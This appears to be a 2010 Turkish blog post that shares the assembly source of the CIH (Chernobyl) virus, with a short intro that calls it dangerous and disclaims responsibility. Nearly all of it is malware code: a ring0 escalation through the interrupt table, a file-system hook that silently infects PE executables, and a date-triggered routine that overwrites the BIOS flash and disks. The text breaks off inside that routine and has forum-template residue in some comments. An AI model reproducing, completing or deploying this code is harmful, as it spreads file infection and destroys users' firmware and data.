Kod Dostu

Kod Dostu

CHERNOBİLE VİRÜSÜ KODLARI

  • Unknown
  • - 14 Şubat 2010

  • Evet Chernobile virüsünün kodlarına da ulaştım. ve şimdi sizlerle de paylaşıyorum. bu kodları .bad olarak kaydederseniz aktif hale gelirler. dikkatli olmanızı öneriyorum denemek bile çok tehlikeli ;) Sorumluluk kabul etmiyorum.







    ************************************************** *************************
    *

    ; * The Virus Program Information *
    ;
    ************************************************** *************************
    *

    ; *
    *
    ; * Designer : CIH Original Place : TTIT of Taiwan *
    ; * Create Date : 04/26/1998 Now Version : 1.2 *
    ; * Modification Time : 05/21/1998
    *
    ; * *
    ;
    *================================================= =========================
    *

    ; * Modification History *
    ;
    *================================================= =========================
    *

    ; * v1.0 1. Create the Virus Program. *
    ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
    ; * 04/26/1998 3. Virus Code doesn't Reload into System.
    *
    ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
    ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
    ; * 6. When System Opens Existing PE File, the File will be *
    ; * Infected, and the File doesn't be Reinfected.
    *
    ; * 7. It is also Infected, even the File is Read-Only. *
    ; * 8. When the File is Infected, the Modification Date and Time *
    ; * of the File also don't be Changed. *
    ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
    ; * Previous FileSystemApiHook, it will Call the Function *
    ; * that the IFS Manager Would Normally Call to Implement *
    ; * this Particular I/O Request. *
    ; * 10. The Virus Size is only 656 Bytes. *
    ;
    *================================================= =========================
    *

    ; * v1.1 1. Especially, the File that be Infected will not Increase *
    ; * it's Size... ^__^ *
    ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
    ; * When Exception Error Occurs, Our OS System should be in *
    ; * Windows NT. So My Cute Virus will not Continue to Run, *
    ; * it will Jmup to Original Application to Run. *
    ; * 3. Use Better Algorithm, Reduce Virus Code Size. *
    ; * 4. The Virus "Basic" Size is only 796 Bytes. *
    ;
    *================================================= =========================
    *

    ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
    ; * 2. Modify the Bug of v1.1 *
    ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
    ;
    ************************************************** *************************
    *


    .586P

    ;
    ************************************************** *************************
    *

    ; * Original PE Executable File(Don't Modify this Section)
    *
    ;
    ************************************************** *************************
    *


    OriginalAppEXE SEGMENT

    FileHeader:
    db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
    db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
    db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
    db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
    db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
    db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
    db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
    db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
    db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
    db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
    db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
    db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
    db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
    db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
    db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
    db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
    db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
    db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
    db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
    db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
    db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
    db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    dd 00000000h, VirusSize

    OriginalAppEXE ENDS

    ;
    ************************************************** *************************
    *

    ; * My Virus Game
    *
    ;
    ************************************************** *************************
    *


    ; ************************************************** *******
    ; * Constant Define *
    ; ************************************************** *******

    TRUE = 1
    FALSE = 0
    DEBUG = TRUE
    MajorVirusVersion = 1
    MinorVirusVersion = 2
    VirusVersion = MajorVirusVersion*10h+MinorVirusVersion

    IF DEBUG
    FirstKillHardDiskNumber = 81h
    HookExceptionNumber = 05h
    ELSE
    FirstKillHardDiskNumber = 80h
    HookExceptionNumber = 03h
    ENDIF

    FileNameBufferSize = 7fh
    ; ************************************************** *******
    VirusGame SEGMENT
    ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
    ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
    ; ************************************************** *******
    ; * Ring3 Virus Game Initial Program *
    ; ************************************************** *******
    MyVirusStart:
    push ebp
    ; *************************************
    ; * Let's Modify Structured Exception *
    ; * Handing, Prevent Exception Error *
    ; * Occurrence, Especially in NT. *
    ; *************************************
    lea eax, [esp-04h*2]
    xor ebx, ebx
    xchg eax, fs:[ebx]
    call [at]0
    [at]0:
    pop ebx
    lea ecx, StopToRunVirusCode-[at]0[ebx]
    push ecx
    push eax
    ; *************************************
    ; * Let's Modify *
    ; * IDT(Interrupt Descriptor Table) *
    ; * to Get Ring0 Privilege... *
    ; *************************************
    push eax ;
    sidt [esp-02h] ; Get IDT Base Address
    pop ebx ;
    add ebx, HookExceptionNumber*08h+04h ; ZF = 0
    cli
    mov ebp, [ebx] ; Get Exception Base
    mov bp, [ebx-04h] ; Entry Point
    lea esi, MyExceptionHook-[at]1[ecx]
    push esi
    mov [ebx-04h], si ;
    shr esi, 16 ; Modify Exception
    mov [ebx+02h], si ; Entry Point Address
    pop esi
    ; *************************************
    ; * Generate Exception to Get Ring0 *
    ; *************************************
    int HookExceptionNumber ; GenerateException
    ReturnAddressOfEndException = $
    ; *************************************
    ; * Merge All Virus Code Section *
    ; *************************************
    push esi
    mov esi, eax
    LoopOfMergeAllVirusCodeSection:
    mov ecx, [eax-04h]
    rep movsb
    sub eax, 08h
    mov esi, [eax]
    or esi, esi
    jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
    jmp LoopOfMergeAllVirusCodeSection
    QuitLoopOfMergeAllVirusCodeSection:
    pop esi
    ; *************************************
    ; * Generate Exception Again *
    ; *************************************
    int HookExceptionNumber ; GenerateException Again
    ; *************************************
    ; * Let's Restore *
    ; * Structured Exception Handing *
    ; *************************************
    ReadyRestoreSE:
    sti
    xor ebx, ebx
    jmp RestoreSE
    ; *************************************
    ; * When Exception Error Occurs, *
    ; * Our OS System should be in NT. *
    ; * So My Cute Virus will not *
    ; * Continue to Run, it Jmups to *
    ; * Original Application to Run. *
    ; *************************************
    StopToRunVirusCode:
    [at]1 = StopToRunVirusCode
    xor ebx, ebx
    mov eax, fs:[ebx]
    mov esp, [eax]
    RestoreSE:
    pop dword ptr fs:[ebx]
    pop eax
    ; *************************************
    ; * Return Original App to Execute *
    ; *************************************
    pop ebp
    push 00401000h ; Push Original
    OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
    ret ; Return to Original App Entry Point
    ; ************************************************** *******
    ; * Ring0 Virus Game Initial Program *
    ; ************************************************** *******
    MyExceptionHook:
    [at]2 = MyExceptionHook
    jz InstallMyFileSystemApiHook
    ; *************************************
    ; * Do My Virus Exist in System !? *
    ; *************************************
    mov ecx, dr0
    jecxz AllocateSystemMemoryPage
    add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
    ; *************************************
    ; * Return to Ring3 Initial Program *
    ; *************************************
    ExitRing0Init:
    mov [ebx-04h], bp ;
    shr ebp, 16 ; Restore Exception
    mov [ebx+02h], bp ;
    iretd
    ; *************************************
    ; * Allocate SystemMemory Page to Use *
    ; *************************************
    AllocateSystemMemoryPage:
    mov dr0, ebx ; Set the Mark of My Virus Exist in System
    push 00000000fh ;
    push ecx ;
    push 0ffffffffh ;
    push ecx ;
    push ecx ;
    push ecx ;
    push 000000001h ;
    push 000000002h ;
    int 20h ; VMMCALL _PageAllocate
    _PageAllocate = $ ;
    dd 00010053h ; Use EAX, ECX, EDX, and flags
    add esp, 08h*04h
    xchg edi, eax ; EDI = SystemMemory Start Address
    lea eax, MyVirusStart-[at]2[esi]
    iretd ; Return to Ring3 Initial Program
    ; *************************************
    ; * Install My File System Api Hook *
    ; *************************************
    InstallMyFileSystemApiHook:
    lea eax, FileSystemApiHook-[at]6[edi]
    push eax ;
    int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
    IFSMgr_InstallFileSystemApiHook = $ ;
    dd 00400067h ; Use EAX, ECX, EDX, and flags
    mov dr0, eax ; Save OldFileSystemApiHook Address
    pop eax ; EAX = FileSystemApiHook Address

    ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
    mov ecx, IFSMgr_InstallFileSystemApiHook-[at]2[esi]
    mov edx, [ecx]
    mov OldInstallFileSystemApiHook-[at]3[eax], edx

    ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
    lea eax, InstallFileSystemApiHook-[at]3[eax]
    mov [ecx], eax

    cli
    jmp ExitRing0Init
    ; ************************************************** *******
    ; * Code Size of Merge Virus Code Section *
    ; ************************************************** *******
    CodeSizeOfMergeVirusCodeSection = offset $
    ; ************************************************** *******
    ; * IFSMgr_InstallFileSystemApiHook *
    ; ************************************************** *******
    InstallFileSystemApiHook:
    push ebx
    call [at]4 ;
    [at]4: ;
    pop ebx ; mov ebx, offset FileSystemApiHook
    add ebx, FileSystemApiHook-[at]4 ;
    push ebx
    int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
    IFSMgr_RemoveFileSystemApiHook = $
    dd 00400068h ; Use EAX, ECX, EDX, and flags
    pop eax

    ; Call Original IFSMgr_InstallFileSystemApiHook
    ; to Link Client FileSystemApiHook
    push dword ptr [esp+8]
    call OldInstallFileSystemApiHook-[at]3[ebx]
    pop ecx
    push eax

    ; Call Original IFSMgr_InstallFileSystemApiHook
    ; to Link My FileSystemApiHook
    push ebx
    call OldInstallFileSystemApiHook-[at]3[ebx]
    pop ecx
    mov dr0, eax ; Adjust OldFileSystemApiHook Address
    pop eax
    pop ebx
    ret
    ; ************************************************** *******
    ; * Static Data *
    ; ************************************************** *******
    OldInstallFileSystemApiHook dd ?
    ; ************************************************** *******
    ; * IFSMgr_FileSystemHook *
    ; ************************************************** *******

    ; *************************************
    ; * IFSMgr_FileSystemHook Entry Point *
    ; *************************************
    FileSystemApiHook:
    [at]3 = FileSystemApiHook
    pushad
    call [at]5 ;
    [at]5: ;
    pop esi ; mov esi, offset
    VirusGameDataStartAddress
    add esi, VirusGameDataStartAddress-[at]5
    ; *************************************
    ; * Is OnBusy !? *
    ; *************************************
    test byte ptr (OnBusy-[at]6)[esi], 01h ; if ( OnBusy )
    jnz pIFSFunc ; goto pIFSFunc
    ; *************************************
    ; * Is OpenFile !? *
    ; *************************************
    ; if ( NotOpenFile )
    ; goto prevhook
    lea ebx, [esp+20h+04h+04h]
    cmp dword ptr [ebx], 00000024h
    jne prevhook
    ; *************************************
    ; * Enable OnBusy *
    ; *************************************
    inc byte ptr (OnBusy-[at]6)[esi] ; Enable OnBusy
    ; *************************************
    ; * Get FilePath's DriveNumber, *
    ; * then Set the DriveName to *
    ; * FileNameBuffer. *
    ; *************************************
    ; * Ex. If DriveNumber is 03h, *
    ; * DriveName is 'C:'. *
    ; *************************************
    ; mov esi, offset FileNameBuffer
    add esi, FileNameBuffer-[at]6
    push esi
    mov al, [ebx+04h]
    cmp al, 0ffh
    je CallUniToBCSPath
    add al, 40h
    mov ah, ':'
    mov [esi], eax
    inc esi
    inc esi
    ; *************************************
    ; * UniToBCSPath *
    ; *************************************
    ; * This Service Converts *
    ; * a Canonicalized Unicode Pathname *
    ; * to a Normal Pathname in the *
    ; * Specified BCS Character Set. *
    ; *************************************
    CallUniToBCSPath:
    push 00000000h
    push FileNameBufferSize
    mov ebx, [ebx+10h]
    mov eax, [ebx+0ch]
    add eax, 04h
    push eax
    push esi
    int 20h ; VXDCall UniToBCSPath
    UniToBCSPath = $
    dd 00400041h
    add esp, 04h*04h
    ; *************************************
    ; * Is FileName '.EXE' !? *
    ; *************************************
    ; cmp [esi+eax-04h], '.EXE'
    cmp [esi+eax-04h], 'EXE.'
    pop esi
    jne DisableOnBusy
    IF DEBUG
    ; *************************************
    ; * Only for Debug *
    ; *************************************
    ; cmp [esi+eax-06h], '****'
    cmp [esi+eax-06h], 'KCUF'
    jne DisableOnBusy
    ENDIF
    ; *************************************
    ; * Is Open Existing File !? *
    ; *************************************
    ; if ( NotOpenExistingFile )
    ; goto DisableOnBusy
    cmp word ptr [ebx+18h], 01h
    jne DisableOnBusy
    ; *************************************
    ; * Get Attributes of the File *
    ; *************************************
    mov ax, 4300h
    int 20h ; VXDCall IFSMgr_Ring0_FileIO
    IFSMgr_Ring0_FileIO = $
    dd 00400032h
    jc DisableOnBusy
    push ecx
    ; *************************************
    ; * Get IFSMgr_Ring0_FileIO Address *
    ; *************************************
    mov edi, dword ptr (IFSMgr_Ring0_FileIO-[at]7)[esi]
    mov edi, [edi]
    ; *************************************
    ; * Is Read-Only File !? *
    ; *************************************
    test cl, 01h
    jz OpenFile
    ; *************************************
    ; * Modify Read-Only File to Write *
    ; *************************************
    mov ax, 4301h
    xor ecx, ecx
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    ; *************************************
    ; * Open File *
    ; *************************************
    OpenFile:
    xor eax, eax
    mov ah, 0d5h
    xor ecx, ecx
    xor edx, edx
    inc edx
    mov ebx, edx
    inc ebx
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    xchg ebx, eax ; mov ebx, FileHandle
    ; *************************************
    ; * Need to Restore *
    ; * Attributes of the File !? *
    ; *************************************
    pop ecx
    pushf
    test cl, 01h
    jz IsOpenFileOK
    ; *************************************
    ; * Restore Attributes of the File *
    ; *************************************
    mov ax, 4301h
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    ; *************************************
    ; * Is Open File OK !? *
    ; *************************************
    IsOpenFileOK:
    popf
    jc DisableOnBusy
    ; *************************************
    ; * Open File Already Succeed. ^__^ *
    ; *************************************
    push esi ; Push FileNameBuffer Address to Stack
    pushf ; Now CF = 0, Push Flag to Stack
    add esi, DataBuffer-[at]7 ; mov esi, offset DataBuffer
    ; ***************************
    ; * Get OffsetToNewHeader *
    ; ***************************
    xor eax, eax
    mov ah, 0d6h

    ; For Doing Minimal VirusCode's Length,
    ; I Save EAX to EBP.
    mov ebp, eax
    xor ecx, ecx
    mov cl, 04h
    xor edx, edx
    mov dl, 3ch
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    mov edx, [esi]
    ; ***************************
    ; * Get 'PE{FORUMS_NEWTOPIC_TEXTONLY}' Signature *
    ; * of ImageFileHeader, and *
    ; * Infected Mark. *
    ; ***************************
    dec edx
    mov eax, ebp
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    ; ***************************
    ; * Is PE !? *
    ; ***************************
    ; * Is the File *
    ; * Already Infected !? *
    ; ***************************
    ; cmp [esi], '{FORUMS_NEWTOPIC_TEXTONLY}PE{FORUMS_NEWTOPIC_TEXT ONLY}'
    cmp dword ptr [esi], 00455000h
    jne CloseFile
    ; *************************************
    ; * The File is ^o^ *
    ; * PE(Portable Executable) indeed. *
    ; *************************************
    ; * The File isn't also Infected. *
    ; *************************************

    ; *************************************
    ; * Start to Infect the File *
    ; *************************************
    ; * Registers Use Status Now : *
    ; * *
    ; * EAX = 04h *
    ; * EBX = File Handle *
    ; * ECX = 04h *
    ; * EDX = 'PE{FORUMS_NEWTOPIC_TEXTONLY}{FORUMS_NEWTOPIC_TEXT ONLY}' Signature of *
    ; * ImageFileHeader Pointer's *
    ; * Former Byte. *
    ; * ESI = DataBuffer Address ==> [at]8 *
    ; * EDI = IFSMgr_Ring0_FileIO Address *
    ; * EBP = D600h ==> Read Data in File *
    ; *************************************
    ; * Stack Dump : *
    ; * *
    ; * ESP => ------------------------- *
    ; * | EFLAG(CF=0) | *
    ; * ------------------------- *
    ; * | FileNameBufferPointer | *
    ; * ------------------------- *
    ; * | EDI | *
    ; * ------------------------- *
    ; * | ESI | *
    ; * ------------------------- *
    ; * | EBP | *
    ; * ------------------------- *
    ; * | ESP | *
    ; * ------------------------- *
    ; * | EBX | *
    ; * ------------------------- *
    ; * | EDX | *
    ; * ------------------------- *
    ; * | ECX | *
    ; * ------------------------- *
    ; * | EAX | *
    ; * ------------------------- *
    ; * | Return Address | *
    ; * ------------------------- *
    ; *************************************
    push ebx ; Save File Handle
    push 00h ; Set VirusCodeSectionTableEndMark
    ; ***************************
    ; * Let's Set the *
    ; * Virus' Infected Mark *
    ; ***************************
    push 01h ; Size
    push edx ; Pointer of File
    push edi ; Address of Buffer
    ; ***************************
    ; * Save ESP Register *
    ; ***************************
    mov dr1, esp
    ; ***************************
    ; * Let's Set the *
    ; * NewAddressOfEntryPoint *
    ; * ( Only First Set Size ) *
    ; ***************************
    push eax ; Size
    ; ***************************
    ; * Let's Read *
    ; * Image Header in File *
    ; ***************************
    mov eax, ebp
    mov cl, SizeOfImageHeaderToRead
    add edx, 07h ; Move EDX to NumberOfSections
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    ; ***************************
    ; * Let's Set the *
    ; * NewAddressOfEntryPoint *
    ; * ( Set Pointer of File, *
    ; * Address of Buffer ) *
    ; ***************************
    lea eax, (AddressOfEntryPoint-[at][edx]
    push eax ; Pointer of File
    lea eax, (NewAddressOfEntryPoint-[at][esi]
    push eax ; Address of Buffer
    ; ***************************
    ; * Move EDX to the Start *
    ; * of SectionTable in File *
    ; ***************************
    movzx eax, word ptr (SizeOfOptionalHeader-[at][esi]
    lea edx, [eax+edx+12h]
    ; ***************************
    ; * Let's Get *
    ; * Total Size of Sections *
    ; ***************************
    mov al, SizeOfScetionTable
    ; I Assume NumberOfSections <= 0ffh
    mov cl, (NumberOfSections-[at][esi]
    mul cl
    ; ***************************
    ; * Let's Set Section Table *
    ; ***************************
    ; Move ESI to the Start of SectionTable
    lea esi, (StartOfSectionTable-[at][esi]
    push eax ; Size
    push edx ; Pointer of File
    push esi ; Address of Buffer
    ; ***************************
    ; * The Code Size of Merge *
    ; * Virus Code Section and *
    ; * Total Size of Virus *
    ; * Code Section Table Must *
    ; * be Small or Equal the *
    ; * Unused Space Size of *
    ; * Following Section Table *
    ; ***************************
    inc ecx
    push ecx ; Save NumberOfSections+1
    shl ecx, 03h
    push ecx ; Save TotalSizeOfVirusCodeSectionTable
    add ecx, eax
    add ecx, edx
    sub ecx, (SizeOfHeaders-[at]9)[esi]
    jnc short OnlySetInfectedMark
    not ecx
    inc ecx
    cmp cx, small CodeSizeOfMergeVirusCodeSection
    jb OnlySetInfectedMark
    ; ***************************
    ; * Save Original *
    ; * Address of Entry Point *
    ; ***************************
    ; Save My Virus First Section Code
    ; Size of Following Section Table...
    ; ( Not Include the Size of Virus Code Section Table )
    push ecx
    xchg ecx, eax ; ECX = Size of Section Table
    mov eax, (AddressOfEntryPoint-[at]9)[esi]
    add eax, (ImageBase-[at]9)[esi]
    mov (OriginalAddressOfEntryPoint-[at]9)[esi], eax
    ; ***************************
    ; * Read All Section Tables *
    ; ***************************
    mov eax, ebp
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    ; ***************************
    ; * Let's Set Total Virus *
    ; * Code Section Table *
    ; ***************************
    ; EBX = My Virus First Section Code
    ; Size of Following Section Table
    pop ebx
    pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
    pop ecx ; ECX = NumberOfSections+1
    push edi ; Size
    add edx, eax
    push edx ; Pointer of File
    add eax, esi
    push eax ; Address of Buffer
    ; ***************************
    ; * Set the First Virus *
    ; * Code Section Size in *
    ; * VirusCodeSectionTable *
    ; ***************************
    lea eax, [eax+edi-04h]
    mov [eax], ebx
    ; ***************************
    ; * Let's Set My Virus *
    ; * First Section Code *
    ; ***************************
    push ebx ; Size
    add edx, edi
    push edx ; Pointer of File
    lea edi, (MyVirusStart-[at]9)[esi]
    push edi ; Address of Buffer
    ; ***************************
    ; * Let's Modify the *
    ; * AddressOfEntryPoint to *
    ; * My Virus Entry Point *
    ; ***************************
    mov (NewAddressOfEntryPoint-[at]9)[esi], edx
    ; ***************************
    ; * Setup Initial Data *
    ; ***************************
    lea edx, [esi-SizeOfScetionTable]
    mov ebp, offset VirusSize
    jmp StartToWriteCodeToSections
    ; ***************************
    ; * Write Code to Sections *
    ; ***************************
    LoopOfWriteCodeToSections:
    add edx, SizeOfScetionTable
    mov ebx, (SizeOfRawData-[at]9)[edx]
    sub ebx, (VirtualSize-[at]9)[edx]
    jbe EndOfWriteCodeToSections
    push ebx ; Size
    sub eax, 08h
    mov [eax], ebx
    mov ebx, (PointerToRawData-[at]9)[edx]
    add ebx, (VirtualSize-[at]9)[edx]
    push ebx ; Pointer of File
    push edi ; Address of Buffer
    mov ebx, (VirtualSize-[at]9)[edx]
    add ebx, (VirtualAddress-[at]9)[edx]
    add ebx, (ImageBase-[at]9)[esi]
    mov [eax+4], ebx
    mov ebx, [eax]
    add (VirtualSize-[at]9)[edx], ebx

    ; Section contains initialized data ==> 00000040h
    ; Section can be Read. ==> 40000000h
    or (Characteristics-[at]9)[edx], 40000040h
    StartToWriteCodeToSections:
    sub ebp, ebx
    jbe SetVirusCodeSectionTableEndMark
    add edi, ebx ; Move Address of Buffer
    EndOfWriteCodeToSections:
    loop LoopOfWriteCodeToSections
    ; ***************************
    ; * Only Set Infected Mark *
    ; ***************************
    OnlySetInfectedMark:
    mov esp, dr1
    jmp WriteVirusCodeToFile
    ; ***************************
    ; * Set Virus Code *
    ; * Section Table End Mark *
    ; ***************************
    SetVirusCodeSectionTableEndMark:

    ; Adjust Size of Virus Section Code to Correct Value
    add [eax], ebp
    add [esp+08h], ebp

    ; Set End Mark
    xor ebx, ebx
    mov [eax-04h], ebx
    ; ***************************
    ; * When VirusGame Calls *
    ; * VxDCall, VMM Modifies *
    ; * the 'int 20h' and the *
    ; * 'Service Identifier' *
    ; * to 'Call [XXXXXXXX]'. *
    ; ***************************
    ; * Before Writing My Virus *
    ; * to File, I Must Restore *
    ; * them First. ^__^ *
    ; ***************************
    lea eax, (LastVxDCallAddress-2-[at]9)[esi]
    mov cl, VxDCallTableSize
    LoopOfRestoreVxDCallID:
    mov word ptr [eax], 20cdh
    mov edx, (VxDCallIDTable+(ecx-1)*04h-[at]9)[esi]
    mov [eax+2], edx
    movzx edx, byte ptr (VxDCallAddressTable+ecx-1-[at]9)[esi]
    sub eax, edx
    loop LoopOfRestoreVxDCallID
    ; ***************************
    ; * Let's Write *
    ; * Virus Code to the File *
    ; ***************************
    WriteVirusCodeToFile:
    mov eax, dr1
    mov ebx, [eax+10h]
    mov edi, [eax]
    LoopOfWriteVirusCodeToFile:
    pop ecx
    jecxz SetFileModificationMark
    mov esi, ecx
    mov eax, 0d601h
    pop edx
    pop ecx
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    jmp LoopOfWriteVirusCodeToFile
    ; ***************************
    ; * Let's Set CF = 1 ==> *
    ; * Need to Restore File *
    ; * Modification Time *
    ; ***************************
    SetFileModificationMark:
    pop ebx
    pop eax
    stc ; Enable CF(Carry Flag)
    pushf
    ; *************************************
    ; * Close File *
    ; *************************************
    CloseFile:
    xor eax, eax
    mov ah, 0d7h
    call edi ; VXDCall IFSMgr_Ring0_FileIO
    ; *************************************
    ; * Need to Restore File Modification *
    ; * Time !? *
    ; *************************************
    popf
    pop esi
    jnc IsKillComputer
    ; *************************************
    ; * Restore File Modification Time *
    ; *************************************
    mov ebx, edi
    mov ax, 4303h
    mov ecx, (FileModificationTime-[at]7)[esi]
    mov edi, (FileModificationTime+2-[at]7)[esi]
    call ebx ; VXDCall IFSMgr_Ring0_FileIO
    ; *************************************
    ; * Disable OnBusy *
    ; *************************************
    DisableOnBusy:
    dec byte ptr (OnBusy-[at]7)[esi] ; Disable OnBusy
    ; *************************************
    ; * Call Previous FileSystemApiHook *
    ; *************************************
    prevhook:
    popad
    mov eax, dr0 ;
    jmp [eax] ; Jump to prevhook
    ; *************************************
    ; * Call the Function that the IFS *
    ; * Manager Would Normally Call to *
    ; * Implement this Particular I/O *
    ; * Request. *
    ; *************************************
    pIFSFunc:
    mov ebx, esp
    push dword ptr [ebx+20h+04h+14h] ; Push pioreq
    call [ebx+20h+04h] ; Call pIFSFunc
    pop ecx ;
    mov [ebx+1ch], eax ; Modify EAX Value in Stack
    ; ***************************
    ; * After Calling pIFSFunc, *
    ; * Get Some Data from the *
    ; * Returned pioreq. *
    ; ***************************
    cmp dword ptr [ebx+20h+04h+04h], 00000024h
    jne QuitMyVirusFileSystemHook
    ; *****************
    ; * Get the File *
    ; * Modification *
    ; * Date and Time *
    ; * in DOS Format.*
    ; *****************
    mov eax, [ecx+28h]
    mov (FileModificationTime-[at]6)[esi], eax
    ; ***************************
    ; * Quit My Virus' *
    ; * IFSMgr_FileSystemHook *
    ; ***************************
    QuitMyVirusFileSystemHook:
    popad
    ret
    ; *************************************
    ; * Kill Computer !? ... *^_^* *
    ; *************************************
    IsKillComputer:
    ; Get Now Month from BIOS CMOS
    mov ax, 0708h
    out 70h, al
    in al, 71h
    xchg ah, al

    ; Get Now Day from BIOS CMOS
    out 70h, al
    in al, 71h
    xor ax, 0426h ; 04/26/????
    jne DisableOnBusy
    ; **************************************
    ; * Kill Kill Kill Kill Kill Kill Kill *
    ; **************************************

    ; ***************************
    ; * Kill BIOS EEPROM *
    ; ***************************
    mov bp, 0cf8h
    lea esi, IOForEEPROM-[at]7[esi]
    ; ***********************
    ; * Show BIOS Page in *
    ; * 000E0000 - 000EFFFF *
    ; * ( 64 KB ) *
    ; ***********************
    mov edi, 8000384ch
    mov dx, 0cfeh
    cli
    call esi
    ; ***********************
    ; * Show BIOS Page in *
    ; * 000F0000 - 000FFFFF *
    ; * ( 64 KB ) *
    ; ***********************
    mov di, 0058h
    dec edx ; and al,0fh
    mov word ptr (BooleanCalculateCode-[at]10)[esi], 0f24h
    call esi
    ; ***********************
    ; * Show the BIOS Extra *
    ; * ROM Data in Memory *
    ; * 000E0000 - 000E01FF *
    ; * ( 512 Bytes ) *
    ; * , and the Section *
    ; * of Extra BIOS can *
    ; * be Writted... *
    ; ***********************
    lea ebx, EnableEEPROMToWrite-[at]10[esi]
    mov eax, 0e5555h
    mov ecx, 0e2aaah
    call ebx
    mov byte ptr [eax], 60h
    push ecx
    loop $
    ; ***********************
    ; * Kill the BIOS Extra *
    ; * ROM Data in Memory *
    ; * 000E0000 - 000E007F *
    ; * ( 80h Bytes ) *
    ; ***********************
    xor ah, ah
    mov [eax], al
